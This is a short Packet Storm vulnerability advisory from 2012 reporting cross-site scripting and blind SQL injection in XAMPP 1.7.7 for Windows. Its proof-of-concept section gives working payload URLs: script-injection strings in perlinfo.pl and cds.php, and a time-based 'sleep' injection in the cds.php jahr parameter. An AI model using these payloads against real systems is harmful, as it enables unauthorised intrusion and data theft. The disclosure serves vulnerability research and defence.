XAMPP Windows version 1.7.7 suffers from cross site scripting and remote blind SQL injection vulnerabilities.
c08378ff45c8e8932736adeab30d3ea9518220e800f304ef446108b4d0e95627$------------------------------------------------------------------------------------------------------------
$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.apachefriends.org/en/xampp-windows.html
$ Date :06/07/2012
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:
XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really
very easy to install and to use - just download, extract and start.
2. POC:
XSS Vulnerabilities:
http://localhost/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E --> still not fixed from version 1.7.4
Blind SQL Injection:
http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$---------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed